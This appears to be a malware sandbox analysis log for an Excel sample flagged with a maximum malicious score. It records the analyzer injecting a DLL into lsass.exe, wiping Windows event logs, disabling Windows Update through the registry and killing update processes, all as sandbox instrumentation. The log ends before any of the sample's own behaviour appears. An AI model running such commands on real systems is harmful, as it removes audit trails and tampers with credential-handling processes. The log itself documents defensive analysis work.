Analysis Report · ACUBE Sandbox

Analysis

Category	Package	Started	Completed	Duration	Options	Log(s)	MalScore
FILE		2025-12-08 16:39:02	2025-12-08 16:43:09	247 seconds	Show Options	Show Analysis Log	10.0

vnc_port=5901

2025-12-06 19:18:15,616 [root] INFO: Date set to: 20251208T08:31:54, timeout set to: 180
2025-12-08 08:31:54,068 [root] DEBUG: Starting analyzer from: C:\tmp65phiig4
2025-12-08 08:31:54,068 [root] DEBUG: Storing results at: C:\XfyAxDRBKY
2025-12-08 08:31:54,068 [root] DEBUG: Pipe server name: \\.\PIPE\AimuLGpBPe
2025-12-08 08:31:54,068 [root] DEBUG: Python path: C:\Python38
2025-12-08 08:31:54,068 [root] INFO: analysis running as an admin
2025-12-08 08:31:54,068 [root] DEBUG: no analysis package configured, picking one for you
2025-12-08 08:31:54,068 [root] INFO: analysis package selected: "zip"
2025-12-08 08:31:54,068 [root] DEBUG: importing analysis package module: "modules.packages.zip"...
2025-12-08 08:31:54,100 [root] DEBUG: imported analysis package "zip"
2025-12-08 08:31:54,100 [root] DEBUG: initializing analysis package "zip"...
2025-12-08 08:31:54,100 [lib.common.common] INFO: wrapping
2025-12-08 08:31:54,100 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:31:54,100 [root] DEBUG: New location of moved file: C:\Users\user\AppData\Local\Temp\32e843c35f0b39a4ff9d.zip
2025-12-08 08:31:54,100 [root] INFO: Analyzer: Package modules.packages.zip does not specify a DLL option
2025-12-08 08:31:54,100 [root] INFO: Analyzer: Package modules.packages.zip does not specify a DLL_64 option
2025-12-08 08:31:54,100 [root] INFO: Analyzer: Package modules.packages.zip does not specify a loader option
2025-12-08 08:31:54,100 [root] INFO: Analyzer: Package modules.packages.zip does not specify a loader_64 option
2025-12-08 08:31:54,194 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser"
2025-12-08 08:31:54,194 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain"
2025-12-08 08:31:54,194 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise"
2025-12-08 08:31:54,194 [root] DEBUG: Imported auxiliary module "modules.auxiliary.during_script"
2025-12-08 08:31:54,194 [root] DEBUG: Imported auxiliary module "modules.auxiliary.end_noisy_tasks"
2025-12-08 08:31:54,209 [root] DEBUG: Imported auxiliary module "modules.auxiliary.evtx"
2025-12-08 08:31:54,209 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human"
2025-12-08 08:31:54,225 [root] DEBUG: Imported auxiliary module "modules.auxiliary.pre_script"
2025-12-08 08:31:54,241 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 08:31:54,241 [lib.api.screenshot] ERROR: No module named 'PIL'
2025-12-08 08:31:54,241 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots"
2025-12-08 08:31:54,241 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon"
2025-12-08 08:31:54,241 [root] DEBUG: Imported auxiliary module "modules.auxiliary.tlsdump"
2025-12-08 08:31:54,256 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage"
2025-12-08 08:31:54,256 [root] DEBUG: Initialized auxiliary module "Browser"
2025-12-08 08:31:54,256 [root] DEBUG: attempting to configure 'Browser' from data
2025-12-08 08:31:54,256 [root] DEBUG: module Browser does not support data configuration, ignoring
2025-12-08 08:31:54,256 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.browser"...
2025-12-08 08:31:54,256 [root] DEBUG: Started auxiliary module modules.auxiliary.browser
2025-12-08 08:31:54,256 [root] DEBUG: Initialized auxiliary module "Curtain"
2025-12-08 08:31:54,256 [root] DEBUG: attempting to configure 'Curtain' from data
2025-12-08 08:31:54,256 [root] DEBUG: module Curtain does not support data configuration, ignoring
2025-12-08 08:31:54,256 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.curtain"...
2025-12-08 08:31:54,256 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain
2025-12-08 08:31:54,256 [root] DEBUG: Initialized auxiliary module "Disguise"
2025-12-08 08:31:54,256 [root] DEBUG: attempting to configure 'Disguise' from data
2025-12-08 08:31:54,256 [root] DEBUG: module Disguise does not support data configuration, ignoring
2025-12-08 08:31:54,256 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.disguise"...
2025-12-08 08:31:54,271 [modules.auxiliary.disguise] INFO: Disguising GUID to 8e8c401b-13c4-4df4-899f-10e9c788238f
2025-12-08 08:31:54,271 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise
2025-12-08 08:31:54,271 [root] DEBUG: Initialized auxiliary module "End_noisy_tasks"
2025-12-08 08:31:54,271 [root] DEBUG: attempting to configure 'End_noisy_tasks' from data
2025-12-08 08:31:54,271 [root] DEBUG: module End_noisy_tasks does not support data configuration, ignoring
2025-12-08 08:31:54,271 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.end_noisy_tasks"...
2025-12-08 08:31:54,271 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wuauclt.exe
2025-12-08 08:31:54,271 [root] DEBUG: Started auxiliary module modules.auxiliary.end_noisy_tasks
2025-12-08 08:31:54,271 [root] DEBUG: Initialized auxiliary module "Evtx"
2025-12-08 08:31:54,271 [root] DEBUG: attempting to configure 'Evtx' from data
2025-12-08 08:31:54,271 [root] DEBUG: module Evtx does not support data configuration, ignoring
2025-12-08 08:31:54,271 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.evtx"...
2025-12-08 08:31:54,287 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security State Change" /success:enable /failure:enable
2025-12-08 08:31:54,287 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx
2025-12-08 08:31:54,287 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 08:31:54,287 [root] DEBUG: attempting to configure 'Human' from data
2025-12-08 08:31:54,287 [root] DEBUG: module Human does not support data configuration, ignoring
2025-12-08 08:31:54,287 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.human"...
2025-12-08 08:31:54,287 [root] DEBUG: Started auxiliary module modules.auxiliary.human
2025-12-08 08:31:54,287 [root] DEBUG: Initialized auxiliary module "Pre_script"
2025-12-08 08:31:54,287 [root] DEBUG: attempting to configure 'Pre_script' from data
2025-12-08 08:31:54,287 [root] DEBUG: module Pre_script does not support data configuration, ignoring
2025-12-08 08:31:54,287 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.pre_script"...
2025-12-08 08:31:54,287 [root] DEBUG: Started auxiliary module modules.auxiliary.pre_script
2025-12-08 08:31:54,287 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 08:31:54,287 [root] DEBUG: attempting to configure 'Screenshots' from data
2025-12-08 08:31:54,287 [root] DEBUG: module Screenshots does not support data configuration, ignoring
2025-12-08 08:31:54,287 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 08:31:54,303 [modules.auxiliary.screenshots] WARNING: Python Image Library is not installed, screenshots are disabled
2025-12-08 08:31:54,303 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots
2025-12-08 08:31:54,303 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 08:31:54,303 [root] DEBUG: attempting to configure 'Sysmon' from data
2025-12-08 08:31:54,303 [root] DEBUG: module Sysmon does not support data configuration, ignoring
2025-12-08 08:31:54,303 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 08:31:54,459 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
2025-12-08 08:31:54,521 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
2025-12-08 08:31:54,616 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.
2025-12-08 08:31:54,616 [root] DEBUG: Initialized auxiliary module "TLSDumpMasterSecrets"
2025-12-08 08:31:54,616 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data
2025-12-08 08:31:54,616 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring
2025-12-08 08:31:54,616 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.tlsdump"...
2025-12-08 08:31:54,616 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 716
2025-12-08 08:31:54,616 [lib.api.process] INFO: Monitor config for <Process 716 lsass.exe>: C:\tmp65phiig4\dll\716.ini
2025-12-08 08:31:54,616 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor
2025-12-08 08:31:54,616 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Driver" /success:disable /failure:disable
2025-12-08 08:31:54,616 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp65phiig4\dll\DZbKUl.dll, loader C:\tmp65phiig4\bin\upsVrGlX.exe
2025-12-08 08:31:54,725 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other System Events" /success:disable /failure:enable
2025-12-08 08:31:54,771 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logon" /success:enable /failure:enable
2025-12-08 08:31:54,787 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wusa.exe
2025-12-08 08:31:54,819 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logoff" /success:enable /failure:enable
2025-12-08 08:31:54,866 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Account Lockout" /success:enable /failure:enable
2025-12-08 08:31:54,881 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM WindowsUpdate.exe
2025-12-08 08:31:54,928 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Main Mode" /success:disable /failure:disable
2025-12-08 08:31:54,959 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM GoogleUpdate.exe
2025-12-08 08:31:54,975 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Quick Mode" /success:disable /failure:disable
2025-12-08 08:31:55,022 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Extended Mode" /success:disable /failure:disable
2025-12-08 08:31:55,037 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM MicrosoftEdgeUpdate.exe
2025-12-08 08:31:55,069 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
2025-12-08 08:31:55,100 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
2025-12-08 08:31:55,147 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable
2025-12-08 08:31:55,162 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
2025-12-08 08:31:55,194 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File System" /success:enable /failure:enable
2025-12-08 08:31:55,194 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v AllowTelemetry /t REG_DWORD /d 0 /f
2025-12-08 08:31:55,225 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Registry" /success:enable /failure:enable
2025-12-08 08:31:55,241 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v EnableICMPRedirect /t REG_DWORD /d 0 /f
2025-12-08 08:31:55,256 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
2025-12-08 08:31:55,334 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"SAM" /success:disable /failure:disable
2025-12-08 08:31:55,381 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
2025-12-08 08:31:55,428 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Handle Manipulation" /success:disable /failure:disable
2025-12-08 08:31:55,506 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Generated" /success:enable /failure:enable
2025-12-08 08:31:55,537 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File Share" /success:enable /failure:enable
2025-12-08 08:31:55,584 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Packet Drop" /success:disable /failure:disable
2025-12-08 08:31:55,616 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Connection" /success:disable /failure:disable
2025-12-08 08:31:55,662 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Object Access Events" /success:disable /failure:disable
2025-12-08 08:31:55,694 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:55,741 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:55,772 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Privilege Use Events" /success:disable /failure:disable
2025-12-08 08:31:55,803 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"RPC Events" /success:enable /failure:enable
2025-12-08 08:31:55,850 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
2025-12-08 08:31:55,896 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Authentication Policy Change" /success:enable /failure:enable
2025-12-08 08:31:55,928 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:disable /failure:disable
2025-12-08 08:31:55,959 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Policy Change" /success:disable /failure:disable
2025-12-08 08:31:55,991 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Policy Change Events" /success:disable /failure:enable
2025-12-08 08:31:56,021 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
2025-12-08 08:31:56,069 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
2025-12-08 08:31:56,084 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
2025-12-08 08:31:56,116 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
2025-12-08 08:31:56,146 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
2025-12-08 08:31:56,194 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable
2025-12-08 08:31:56,209 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
2025-12-08 08:31:56,241 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
2025-12-08 08:31:56,272 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Replication" /success:disable /failure:enable
2025-12-08 08:31:56,303 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Detailed Directory Service Replication" /success:disable /failure:disable
2025-12-08 08:31:56,334 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
2025-12-08 08:31:56,366 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
2025-12-08 08:31:56,396 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable
2025-12-08 08:31:56,428 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
2025-12-08 08:31:56,444 [modules.auxiliary.evtx] DEBUG: Wiping Application
2025-12-08 08:31:56,475 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents
2025-12-08 08:31:56,506 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer
2025-12-08 08:31:56,537 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service
2025-12-08 08:31:56,553 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts
2025-12-08 08:31:56,584 [modules.auxiliary.evtx] DEBUG: Wiping Security
2025-12-08 08:31:56,616 [modules.auxiliary.evtx] DEBUG: Wiping Setup
2025-12-08 08:31:56,646 [modules.auxiliary.evtx] DEBUG: Wiping System
2025-12-08 08:31:56,662 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell
2025-12-08 08:31:56,694 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational
2025-12-08 08:32:18,657 [root] DEBUG: Loader: Injecting process 716 with C:\tmp65phiig4\dll\DZbKUl.dll.
2025-12-08 08:32:42,671 [root] DEBUG: 716: Python path set to 'C:\Python38'.
2025-12-08 08:32:42,686 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:42,686 [root] DEBUG: 716: TLS secret dump mode enabled.
2025-12-08 08:32:42,686 [root] DEBUG: 716: GetAddressByYara: ModuleBase 0x00007FFCDC350000 FunctionName RtlInsertInvertedFunctionTable
2025-12-08 08:32:42,686 [root] DEBUG: 716: RtlInsertInvertedFunctionTable 0x00007FFCDC37BBFA, LdrpInvertedFunctionTableSRWLock 0x00007FFCDC4D70F0
2025-12-08 08:32:42,686 [root] DEBUG: 716: Monitor initialised: 64-bit capemon loaded in process 716 at 0x00007FFCAE780000, thread 1916, image base 0x00007FF6BC8A0000, stack from 0x0000001E0C174000-0x0000001E0C180000
2025-12-08 08:32:42,686 [root] DEBUG: 716: Commandline: C:\Windows\system32\lsass.exe
2025-12-08 08:32:42,686 [root] DEBUG: 716: Hooked 5 out of 5 functions
2025-12-08 08:32:42,686 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:32:42,686 [root] DEBUG: Successfully injected DLL C:\tmp65phiig4\dll\DZbKUl.dll.
2025-12-08 08:32:42,702 [lib.api.process] INFO: Injected into 64-bit <Process 716 lsass.exe>
2025-12-08 08:32:42,702 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump
2025-12-08 08:32:42,702 [root] DEBUG: Initialized auxiliary module "Usage"
2025-12-08 08:32:42,702 [root] DEBUG: attempting to configure 'Usage' from data
2025-12-08 08:32:42,702 [root] DEBUG: module Usage does not support data configuration, ignoring
2025-12-08 08:32:42,702 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.usage"...
2025-12-08 08:32:42,702 [root] DEBUG: Started auxiliary module modules.auxiliary.usage
2025-12-08 08:32:42,702 [root] DEBUG: Initialized auxiliary module "During_script"
2025-12-08 08:32:42,702 [root] DEBUG: attempting to configure 'During_script' from data
2025-12-08 08:32:42,702 [root] DEBUG: module During_script does not support data configuration, ignoring
2025-12-08 08:32:42,702 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.during_script"...
2025-12-08 08:32:42,702 [root] DEBUG: Started auxiliary module modules.auxiliary.during_script
2025-12-08 08:32:45,327 [root] INFO: Restarting WMI Service
2025-12-08 08:32:47,389 [root] DEBUG: package modules.packages.zip does not support configure, ignoring
2025-12-08 08:32:47,389 [root] WARNING: configuration error for package modules.packages.zip: error importing data.packages.zip: No module named 'data.packages'
2025-12-08 08:32:47,389 [lib.common.zip_utils] DEBUG: Archive is encrypted, using default password value: infected
2025-12-08 08:32:47,389 [lib.common.zip_utils] DEBUG: ['C:\\Program Files\\7-Zip\\7z.exe', 'l', 'C:\\Users\\user\\AppData\\Local\\Temp\\32e843c35f0b39a4ff9d.zip']
2025-12-08 08:33:36,014 [lib.common.zip_utils] DEBUG: ['C:\\Program Files\\7-Zip\\7z.exe', 'x', '-p', '-y', '-oC:\\Users\\user\\AppData\\Local\\Temp', 'C:\\Users\\user\\AppData\\Local\\Temp\\32e843c35f0b39a4ff9d.zip']
2025-12-08 08:33:36,359 [lib.common.zip_utils] DEBUG: b'\r\n7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20\r\n\r\nScanning the drive for archives:\r\n1 file, 100322 bytes (98 KiB)\r\n\r\nExtracting archive: C:\\Users\\user\\AppData\\Local\\Temp\\32e843c35f0b39a4ff9d.zip\r\n--\r\nPath = C:\\Users\\user\\AppData\\Local\\Temp\\32e843c35f0b39a4ff9d.zip\r\nType = zip\r\nPhysical Size = 100322\r\n\r\n\r\nSub items Errors: 1\r\n\r\nArchives with Errors: 1\r\n\r\nSub items Errors: 1\r\n' b'ERROR: Wrong password : 32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls\r\n'
2025-12-08 08:33:36,359 [lib.common.zip_utils] DEBUG: ['C:\\Program Files\\7-Zip\\7z.exe', 'x', '-pinfected', '-y', '-oC:\\Users\\user\\AppData\\Local\\Temp', 'C:\\Users\\user\\AppData\\Local\\Temp\\32e843c35f0b39a4ff9d.zip']
2025-12-08 08:33:36,641 [lib.common.zip_utils] DEBUG: b'\r\n7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20\r\n\r\nScanning the drive for archives:\r\n1 file, 100322 bytes (98 KiB)\r\n\r\nExtracting archive: C:\\Users\\user\\AppData\\Local\\Temp\\32e843c35f0b39a4ff9d.zip\r\n--\r\nPath = C:\\Users\\user\\AppData\\Local\\Temp\\32e843c35f0b39a4ff9d.zip\r\nType = zip\r\nPhysical Size = 100322\r\n\r\nEverything is Ok\r\n\r\nSize:       144403\r\nCompressed: 100322\r\n' b''
2025-12-08 08:33:36,641 [lib.common.zip_utils] INFO: Uploading C:\Users\user\AppData\Local\Temp\32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls to host
2025-12-08 08:33:36,641 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls to files/32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f; Size is 144403; Max size: 100000000
2025-12-08 08:33:36,641 [modules.packages.zip] DEBUG: Missing file option, auto executing: ['32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls']
2025-12-08 08:33:36,641 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:33:36,860 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls" /q" with pid 6768
2025-12-08 08:33:36,860 [lib.api.process] INFO: Monitor config for <Process 6768 EXCEL.EXE>: C:\tmp65phiig4\dll\6768.ini
2025-12-08 08:33:36,860 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp65phiig4\dll\hcwYgGY.dll, loader C:\tmp65phiig4\bin\cyHVgjr.exe
2025-12-08 08:34:00,920 [root] DEBUG: Loader: Injecting process 6768 (thread 5144) with C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:34:00,920 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:34:00,920 [root] DEBUG: Successfully injected DLL C:\tmp65phiig4\dll\hcwYgGY.dll.
2025-12-08 08:34:00,920 [lib.api.process] INFO: Injected into 32-bit <Process 6768 EXCEL.EXE>
2025-12-08 08:34:02,936 [lib.api.process] INFO: Successfully resumed <Process 6768 EXCEL.EXE>
2025-12-08 08:34:27,103 [root] DEBUG: 6768: Python path set to 'C:\Python38'.
2025-12-08 08:34:27,103 [root] INFO: Disabling sleep skipping.
2025-12-08 08:34:27,103 [root] DEBUG: 6768: Dropped file limit defaulting to 100.
2025-12-08 08:34:27,134 [root] DEBUG: 6768: Microsoft Office settings enabled.
2025-12-08 08:34:27,150 [root] DEBUG: 6768: AmsiDumper initialised.
2025-12-08 08:34:27,150 [root] DEBUG: 6768: Monitor initialised: 32-bit capemon loaded in process 6768 at 0x749a0000, thread 5144, image base 0x8b0000, stack from 0x3cf5000-0x3d00000
2025-12-08 08:34:27,150 [root] DEBUG: 6768: Commandline: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls" /q
2025-12-08 08:34:27,150 [root] DEBUG: 6768: hook_api: Warning - CoCreateInstance export address 0x75730FEB differs from GetProcAddress -> 0x75F0FF70 (combase.dll::0xdff70)
2025-12-08 08:34:27,150 [root] DEBUG: 6768: hook_api: Warning - CoCreateInstanceEx export address 0x7573102A differs from GetProcAddress -> 0x75F5CCF0 (combase.dll::0x12ccf0)
2025-12-08 08:34:27,150 [root] DEBUG: 6768: hook_api: Warning - CoGetClassObject export address 0x757315BA differs from GetProcAddress -> 0x75ED2BD0 (combase.dll::0xa2bd0)
2025-12-08 08:34:27,150 [root] DEBUG: 6768: hook_api: Warning - CreateRemoteThreadEx export address 0x76289A4C differs from GetProcAddress -> 0x76AEDDB0 (KERNELBASE.dll::0x11ddb0)
2025-12-08 08:34:27,150 [root] DEBUG: 6768: hook_api: Warning - CLSIDFromProgID export address 0x75730824 differs from GetProcAddress -> 0x75EA54C0 (combase.dll::0x754c0)
2025-12-08 08:34:27,150 [root] DEBUG: 6768: hook_api: Warning - CLSIDFromProgIDEx export address 0x75730861 differs from GetProcAddress -> 0x75E9FF40 (combase.dll::0x6ff40)
2025-12-08 08:34:27,165 [root] DEBUG: 6768: Hooked 434 out of 434 functions
2025-12-08 08:34:27,165 [root] DEBUG: 6768: Syscall hook installed, syscall logging level 1
2025-12-08 08:34:27,165 [root] DEBUG: 6768: WoW64fix: Windows version 10.0 not supported.
2025-12-08 08:34:27,165 [root] INFO: Loaded monitor into process with pid 6768
2025-12-08 08:34:27,197 [root] DEBUG: 6768: DLL loaded at 0x758D0000: C:\Windows\System32\oleaut32 (0x9c000 bytes).
2025-12-08 08:34:27,228 [root] DEBUG: 6768: DLL loaded at 0x73DA0000: C:\Windows\SYSTEM32\CRYPTUI (0x49000 bytes).
2025-12-08 08:34:27,243 [root] DEBUG: 6768: DLL loaded at 0x750C0000: C:\Windows\SYSTEM32\IPHLPAPI (0x24000 bytes).
2025-12-08 08:34:27,243 [root] DEBUG: 6768: DLL loaded at 0x72340000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso20win32client (0x6db000 bytes).
2025-12-08 08:34:27,290 [root] DEBUG: 6768: DLL loaded at 0x73D50000: C:\Windows\SYSTEM32\wevtapi (0x45000 bytes).
2025-12-08 08:34:27,290 [root] DEBUG: 6768: DLL loaded at 0x71840000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso30win32client (0xaf4000 bytes).
2025-12-08 08:34:27,353 [root] DEBUG: 6768: DLL loaded at 0x73BE0000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.22621.2506_none_9fa484a5e29783d4\gdiplus (0x16d000 bytes).
2025-12-08 08:34:27,353 [root] DEBUG: 6768: DLL loaded at 0x6FFF0000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso40uiwin32client (0xd14000 bytes).
2025-12-08 08:34:27,369 [root] DEBUG: 6768: DLL loaded at 0x73AF0000: C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\mso50win32client (0xea000 bytes).
2025-12-08 08:34:27,447 [root] DEBUG: 6768: DLL loaded at 0x747C0000: C:\Windows\SYSTEM32\HTTPAPI (0xf000 bytes).
2025-12-08 08:34:27,447 [root] DEBUG: 6768: DLL loaded at 0x73A20000: C:\Windows\SYSTEM32\PROPSYS (0xc7000 bytes).
2025-12-08 08:34:27,447 [root] DEBUG: 6768: DLL loaded at 0x747B0000: C:\Windows\SYSTEM32\WTSAPI32 (0xf000 bytes).
